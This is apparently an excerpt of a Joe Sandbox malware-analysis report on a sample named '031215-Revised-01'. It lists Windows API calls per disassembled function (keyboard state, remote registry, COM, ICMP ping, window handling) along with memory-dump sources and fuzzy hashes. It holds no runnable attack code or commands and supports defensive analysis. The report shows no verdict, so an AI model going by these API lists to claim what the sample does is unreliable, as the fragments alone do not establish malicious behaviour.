                                        • Sleep.KERNEL32(0000000A), ref: 000DE6E1
                                        • EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 000DE705
                                        • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 000DE727
                                        • SetActiveWindow.USER32 ref: 000DE746
                                        • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 000DE754
                                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 000DE773
                                        • Sleep.KERNEL32(000000FA), ref: 000DE77E
                                        • IsWindow.USER32 ref: 000DE78A
                                        • EndDialog.USER32(00000000), ref: 000DE79B
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                        • String ID: BUTTON
                                        • API String ID: 1194449130-3405671355
                                        • Opcode ID: 5cdebe4e95a5d1ae6249dd4bb11c6a3be307862d4a50ee195cab28368aff2357
                                        • Instruction ID: 844685b01a46824c84644d407e8683736d640b5b9c6c28de0e2ee0ea27e713ea
                                        • Opcode Fuzzy Hash: 5cdebe4e95a5d1ae6249dd4bb11c6a3be307862d4a50ee195cab28368aff2357
                                        • Instruction Fuzzy Hash: 5C218474204344AFEB506F60EC89A3A3B69F755348F500526F94585BB1DBB1ACC08E75
                                        APIs
                                          • Part of subcall function 00079CB3: _wcslen.LIBCMT ref: 00079CBD
                                        • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 000DEA5D
                                        • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 000DEA73
                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 000DEA84
                                        • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 000DEA96
                                        • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 000DEAA7
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: SendString$_wcslen
                                        • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                        • API String ID: 2420728520-1007645807
                                        • Opcode ID: f176a9abfc086b2c17da9e9a592f10c388398dce7933e1b47bed73c32331de6b
                                        • Instruction ID: 1c6091ea2550a7a38639931444192e86ddaf12e7176e2eff42b2f674dd85ea3d
                                        • Opcode Fuzzy Hash: f176a9abfc086b2c17da9e9a592f10c388398dce7933e1b47bed73c32331de6b
                                        • Instruction Fuzzy Hash: 89119131A902597DD720B7A5DC4AEFF6ABCEBD1B04F00442AB415A60D1EFB01A05C6B1
                                        APIs
                                        • GetDlgItem.USER32(?,00000001), ref: 000D5CE2
                                        • GetWindowRect.USER32(00000000,?), ref: 000D5CFB
                                        • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 000D5D59
                                        • GetDlgItem.USER32(?,00000002), ref: 000D5D69
                                        • GetWindowRect.USER32(00000000,?), ref: 000D5D7B
                                        • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 000D5DCF
                                        • GetDlgItem.USER32(?,000003E9), ref: 000D5DDD
                                        • GetWindowRect.USER32(00000000,?), ref: 000D5DEF
                                        • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 000D5E31
                                        • GetDlgItem.USER32(?,000003EA), ref: 000D5E44
                                        • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 000D5E5A
                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 000D5E67
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Window$ItemMoveRect$Invalidate
                                        • String ID:
                                        • API String ID: 3096461208-0
                                        • Opcode ID: 2c9e754c3f4698db8bed1b28e1947a17449679a9962da646d9cc841739bbd1ec
                                        • Instruction ID: 7b29f9fbf567ed02b4d99ceae3dae32bce2af2da4c9c5ad1842f3efe902f0d4d
                                        • Opcode Fuzzy Hash: 2c9e754c3f4698db8bed1b28e1947a17449679a9962da646d9cc841739bbd1ec
                                        • Instruction Fuzzy Hash: A051FF71A00705AFDB18DF68DD89AAE7BB6EB48301F148229F915E7790D7709E44CF60
                                        APIs
                                          • Part of subcall function 00088F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00088BE8,?,00000000,?,?,?,?,00088BBA,00000000,?), ref: 00088FC5
                                        • DestroyWindow.USER32(?), ref: 00088C81
                                        • KillTimer.USER32(00000000,?,?,?,?,00088BBA,00000000,?), ref: 00088D1B
                                        • DestroyAcceleratorTable.USER32(00000000), ref: 000C6973
                                        • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00088BBA,00000000,?), ref: 000C69A1
                                        • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00088BBA,00000000,?), ref: 000C69B8
                                        • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00088BBA,00000000), ref: 000C69D4
                                        • DeleteObject.GDI32(00000000), ref: 000C69E6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                        • String ID:
                                        • API String ID: 641708696-0
                                        • Opcode ID: 4860f6110433edaec37644723ec0df8be16f1ca49c12922b4912e488cd824867
                                        • Instruction ID: 8a6b37c2b4c4198a342deca1cc1d201c617e9abf2e47f4970b9ef33621f9984f
                                        • Opcode Fuzzy Hash: 4860f6110433edaec37644723ec0df8be16f1ca49c12922b4912e488cd824867
                                        • Instruction Fuzzy Hash: 6D617934502710EFDB75AF14DA48B2AB7F1FB41316F94852CE0829A9B4CB72A9C0CF91
                                        APIs
                                          • Part of subcall function 00089944: GetWindowLongW.USER32(?,000000EB), ref: 00089952
                                        • GetSysColor.USER32(0000000F), ref: 00089862
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: ColorLongWindow
                                        • String ID:
                                        • API String ID: 259745315-0
                                        • Opcode ID: 3bbc4df3228e0471ea7d8e1d04dcb4d3e6df0bb1f5357d8a4f0903e683083a61
                                        • Instruction ID: 68ba847ddbafc70b0ea67003a11c2d444b7b0e0d191b4e51e338947961983881
                                        • Opcode Fuzzy Hash: 3bbc4df3228e0471ea7d8e1d04dcb4d3e6df0bb1f5357d8a4f0903e683083a61
                                        • Instruction Fuzzy Hash: 72419131204641EFDB607F389C84BB93BA5BB46334F184619F9E6871E1DB719C82DB60
                                        APIs
                                        • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,000BF7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 000D9717
                                        • LoadStringW.USER32(00000000,?,000BF7F8,00000001), ref: 000D9720
                                          • Part of subcall function 00079CB3: _wcslen.LIBCMT ref: 00079CBD
                                        • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,000BF7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 000D9742
                                        • LoadStringW.USER32(00000000,?,000BF7F8,00000001), ref: 000D9745
                                        • MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 000D9866
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: HandleLoadModuleString$Message_wcslen
                                        • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                        • API String ID: 747408836-2268648507
                                        • Opcode ID: f3ad853d4b248286d2e6ed1b94594a61cb9f9d4353d61c7f24d867da73fda9bb
                                        • Instruction ID: 1de03bf7564a11e61c9c1540a2069e05b18e089cf48d1b02daf5c1ea9ca12d12
                                        • Opcode Fuzzy Hash: f3ad853d4b248286d2e6ed1b94594a61cb9f9d4353d61c7f24d867da73fda9bb
                                        • Instruction Fuzzy Hash: 78413B72D00209AADB14EBA0CE46DEEB778AF55340F508125F60A72193EF396F48CB75
                                        APIs
                                          • Part of subcall function 00076B57: _wcslen.LIBCMT ref: 00076B6A
                                        • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 000D07A2
                                        • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 000D07BE
                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 000D07DA
                                        • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 000D0804
                                        • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 000D082C
                                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 000D0837
                                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 000D083C
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                        • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                        • API String ID: 323675364-22481851
                                        • Opcode ID: 79b2291befbb93bd089fbb6145b12ffe593b743d77009585e63aaf75747028a8
                                        • Instruction ID: f4bcc53c0d3201af9bafa6b396c6a55af1a7bbdb73afc480665526afde6f68be
                                        • Opcode Fuzzy Hash: 79b2291befbb93bd089fbb6145b12ffe593b743d77009585e63aaf75747028a8
                                        • Instruction Fuzzy Hash: AA412972C10228EBDF11EBA4DC85DEDB7B8BF44750F44812AE905A31A1EB745E44CFA0
                                        APIs
                                        • VariantInit.OLEAUT32(?), ref: 000F3C5C
                                        • CoInitialize.OLE32(00000000), ref: 000F3C8A
                                        • CoUninitialize.OLE32 ref: 000F3C94
                                        • _wcslen.LIBCMT ref: 000F3D2D
                                        • GetRunningObjectTable.OLE32(00000000,?), ref: 000F3DB1
                                        • SetErrorMode.KERNEL32(00000001,00000029), ref: 000F3ED5
                                        • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 000F3F0E
                                        • CoGetObject.OLE32(?,00000000,0010FB98,?), ref: 000F3F2D
                                        • SetErrorMode.KERNEL32(00000000), ref: 000F3F40
                                        • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 000F3FC4
                                        • VariantClear.OLEAUT32(?), ref: 000F3FD8
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                        • String ID:
                                        • API String ID: 429561992-0
                                        • Opcode ID: b131812b4b8793b6bcb93525ecda5627bc201e3f4a30a288a6036acc4092749a
                                        • Instruction ID: 48525fa4ac6fa76444607ac693ef4df9c2abb1ed3972155bd986b039e9b2963a
                                        • Opcode Fuzzy Hash: b131812b4b8793b6bcb93525ecda5627bc201e3f4a30a288a6036acc4092749a
                                        • Instruction Fuzzy Hash: 8BC177716083099FC700DF28C88496BBBE9FF89758F10491DFA8A9B251D771EE45CB92
                                        APIs
                                        • CoInitialize.OLE32(00000000), ref: 000E7AF3
                                        • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 000E7B8F
                                        • SHGetDesktopFolder.SHELL32(?), ref: 000E7BA3
                                        • CoCreateInstance.OLE32(0010FD08,00000000,00000001,00136E6C,?), ref: 000E7BEF
                                        • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 000E7C74
                                        • CoTaskMemFree.OLE32(?,?), ref: 000E7CCC
                                        • SHBrowseForFolderW.SHELL32(?), ref: 000E7D57
                                        • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 000E7D7A
                                        • CoTaskMemFree.OLE32(00000000), ref: 000E7D81
                                        • CoTaskMemFree.OLE32(00000000), ref: 000E7DD6
                                        • CoUninitialize.OLE32 ref: 000E7DDC
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                        • String ID:
                                        • API String ID: 2762341140-0
                                        • Opcode ID: df4d8f3505d43c273e7a92f66f2547db95a9b8289fc4c43f27f6887d52f1f52e
                                        • Instruction ID: b5604601ef3f044c35b9a49de9eb308333796e181ad3ce67f73df5cedcda55b3
                                        • Opcode Fuzzy Hash: df4d8f3505d43c273e7a92f66f2547db95a9b8289fc4c43f27f6887d52f1f52e
                                        • Instruction Fuzzy Hash: 86C12B75A04149AFCB14DFA5C884DAEBBF9FF48304B148599E819EB362D731EE41CB90
                                        APIs
                                        • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00105504
                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00105515
                                        • CharNextW.USER32(00000158), ref: 00105544
                                        • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00105585
                                        • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0010559B
                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 001055AC
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: MessageSend$CharNext
                                        • String ID:
                                        • API String ID: 1350042424-0
                                        • Opcode ID: a634db3e9d040984215c749f1ad18121939c77b26a5dd954fc3b8e0c46b681b9
                                        • Instruction ID: ef943e3b91cd845f0b354bfb4bfa853e2b529c6bd9238bfff3feca0d8f174845
                                        • Opcode Fuzzy Hash: a634db3e9d040984215c749f1ad18121939c77b26a5dd954fc3b8e0c46b681b9
                                        • Instruction Fuzzy Hash: 77617C34900609ABDF209F54CC84DFF7BBAEB0A724F104145F9A5AB2D1DBB59A81DF60
                                        APIs
                                        • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 000CFAAF
                                        • SafeArrayAllocData.OLEAUT32(?), ref: 000CFB08
                                        • VariantInit.OLEAUT32(?), ref: 000CFB1A
                                        • SafeArrayAccessData.OLEAUT32(?,?), ref: 000CFB3A
                                        • VariantCopy.OLEAUT32(?,?), ref: 000CFB8D
                                        • SafeArrayUnaccessData.OLEAUT32(?), ref: 000CFBA1
                                        • VariantClear.OLEAUT32(?), ref: 000CFBB6
                                        • SafeArrayDestroyData.OLEAUT32(?), ref: 000CFBC3
                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 000CFBCC
                                        • VariantClear.OLEAUT32(?), ref: 000CFBDE
                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 000CFBE9
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                        • String ID:
                                        • API String ID: 2706829360-0
                                        • Opcode ID: 7923c3ea879ea011f88670fe854e1404966d8394bd98c0e4423e156bc6c126c9
                                        • Instruction ID: 5e643b4a18afa6442c458bc81f24838f5bd2f3bd4becc5b273276a4d1c514156
                                        • Opcode Fuzzy Hash: 7923c3ea879ea011f88670fe854e1404966d8394bd98c0e4423e156bc6c126c9
                                        • Instruction Fuzzy Hash: CB412D75A0021A9FCB009F64C854EEEBBBAFF48344F008169E945E7661CB74A945CFA1
                                        APIs
                                        • GetKeyboardState.USER32(?), ref: 000D9CA1
                                        • GetAsyncKeyState.USER32(000000A0), ref: 000D9D22
                                        • GetKeyState.USER32(000000A0), ref: 000D9D3D
                                        • GetAsyncKeyState.USER32(000000A1), ref: 000D9D57
                                        • GetKeyState.USER32(000000A1), ref: 000D9D6C
                                        • GetAsyncKeyState.USER32(00000011), ref: 000D9D84
                                        • GetKeyState.USER32(00000011), ref: 000D9D96
                                        • GetAsyncKeyState.USER32(00000012), ref: 000D9DAE
                                        • GetKeyState.USER32(00000012), ref: 000D9DC0
                                        • GetAsyncKeyState.USER32(0000005B), ref: 000D9DD8
                                        • GetKeyState.USER32(0000005B), ref: 000D9DEA
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: State$Async$Keyboard
                                        • String ID:
                                        • API String ID: 541375521-0
                                        • Opcode ID: 7c7f4cd3f5800e9d4d6ccc8f79edcdbd69d3ff44a44f16bfe76a62effef561b1
                                        • Instruction ID: 2f6852a9a87ea32678bc9becedcbcc4593aaea8546a66299df99d97a874e0cd8
                                        • Opcode Fuzzy Hash: 7c7f4cd3f5800e9d4d6ccc8f79edcdbd69d3ff44a44f16bfe76a62effef561b1
                                        • Instruction Fuzzy Hash: D341A6346047CA69FFB1976488043B5BEE16F11344F04815BDAC6567C2EBE599C8CBB2
                                        APIs
                                        • WSAStartup.WSOCK32(00000101,?), ref: 000F05BC
                                        • inet_addr.WSOCK32(?), ref: 000F061C
                                        • gethostbyname.WSOCK32(?), ref: 000F0628
                                        • IcmpCreateFile.IPHLPAPI ref: 000F0636
                                        • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 000F06C6
                                        • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 000F06E5
                                        • IcmpCloseHandle.IPHLPAPI(?), ref: 000F07B9
                                        • WSACleanup.WSOCK32 ref: 000F07BF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                        • String ID: Ping
                                        • API String ID: 1028309954-2246546115
                                        • Opcode ID: 0c1ab6667f1a41ae30c9e64371eef19c2fa291d797bb55efa87dfb35939ffe13
                                        • Instruction ID: c44f3b36d41ef0936cf1c6c699d7007b6986599dbb212499aa46cf73ac276b9d
                                        • Opcode Fuzzy Hash: 0c1ab6667f1a41ae30c9e64371eef19c2fa291d797bb55efa87dfb35939ffe13
                                        • Instruction Fuzzy Hash: 7D917F759087019FD720DF15C888F2ABBE0AF84318F1485A9E5A98BAA3C770ED41DF91
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: _wcslen$BuffCharLower
                                        • String ID: cdecl$none$stdcall$winapi
                                        • API String ID: 707087890-567219261
                                        • Opcode ID: be5d2a53ac117fae1ab85d82fe17465e5876fe6e50a2fcd2ca614dad54159b44
                                        • Instruction ID: 2faba0887317f436e8b1fea5b6df58625d91c19fa530eccb96d50874f9627870
                                        • Opcode Fuzzy Hash: be5d2a53ac117fae1ab85d82fe17465e5876fe6e50a2fcd2ca614dad54159b44
                                        • Instruction Fuzzy Hash: BA51D172A0051A9BCF64DF68C9418FEB7E5BF64320B218229E626E76C1DF34DD40E790
                                        APIs
                                        • CoInitialize.OLE32 ref: 000F3774
                                        • CoUninitialize.OLE32 ref: 000F377F
                                        • CoCreateInstance.OLE32(?,00000000,00000017,0010FB78,?), ref: 000F37D9
                                        • IIDFromString.OLE32(?,?), ref: 000F384C
                                        • VariantInit.OLEAUT32(?), ref: 000F38E4
                                        • VariantClear.OLEAUT32(?), ref: 000F3936
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                        • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                        • API String ID: 636576611-1287834457
